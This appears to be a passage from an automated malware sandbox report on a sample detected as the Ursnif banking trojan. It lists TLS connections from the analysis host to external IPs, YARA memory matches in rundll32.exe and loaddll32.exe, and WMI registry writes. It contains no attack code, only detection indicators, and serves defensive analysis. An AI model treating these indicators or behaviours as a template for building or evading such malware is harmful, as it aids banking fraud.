Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49809 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49821 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49822 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 195.20.250.115:443 -> 192.168.2.4:49826 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 195.20.250.115:443 -> 192.168.2.4:49827 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49837 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49836 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49839 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49838 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.4:49845 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.4:49846 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49849 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49850 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49851 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49852 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49858 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49859 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49860 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49861 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49863 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49862 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49864 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49865 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49870 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49871 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49872 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49873 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49873 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49874 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49875 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49876 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49877 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.718768044.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792588340.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.910870766.000000000500C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743986098.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754576282.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886665865.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743884780.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718843741.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921590323.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754698141.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.942431868.0000000006548000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754769459.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921653707.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.866559376.0000000004E6C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.918784964.0000000006548000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887362979.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754654918.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743778425.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792300169.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743828986.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792520115.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718744882.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792349818.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921759909.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.926000939.0000000005D38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.744005054.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886778931.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718819209.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743935552.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792420602.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792562195.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754876807.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887204962.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718696614.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886970529.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718647612.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754836366.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.858457272.000000000564C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921808684.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.824971303.0000000001CAC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.744015390.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743688599.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718721890.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887090567.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887042071.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718792278.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754897105.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887180889.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887136487.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792489565.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792387675.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754923089.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.940528675.0000000005D38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6632, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6560, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.718768044.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792588340.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.910870766.000000000500C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743986098.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754576282.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886665865.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743884780.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718843741.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921590323.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754698141.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.942431868.0000000006548000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754769459.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921653707.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.866559376.0000000004E6C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.918784964.0000000006548000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887362979.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754654918.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743778425.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792300169.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743828986.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792520115.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718744882.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792349818.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921759909.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.926000939.0000000005D38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.744005054.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886778931.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718819209.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743935552.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792420602.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792562195.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754876807.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887204962.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718696614.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886970529.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718647612.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754836366.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.858457272.000000000564C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921808684.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.824971303.0000000001CAC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.744015390.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743688599.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718721890.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887090567.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887042071.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718792278.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754897105.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887180889.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887136487.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792489565.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792387675.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754923089.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.940528675.0000000005D38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6632, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6560, type: MEMORY

System Summary:

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
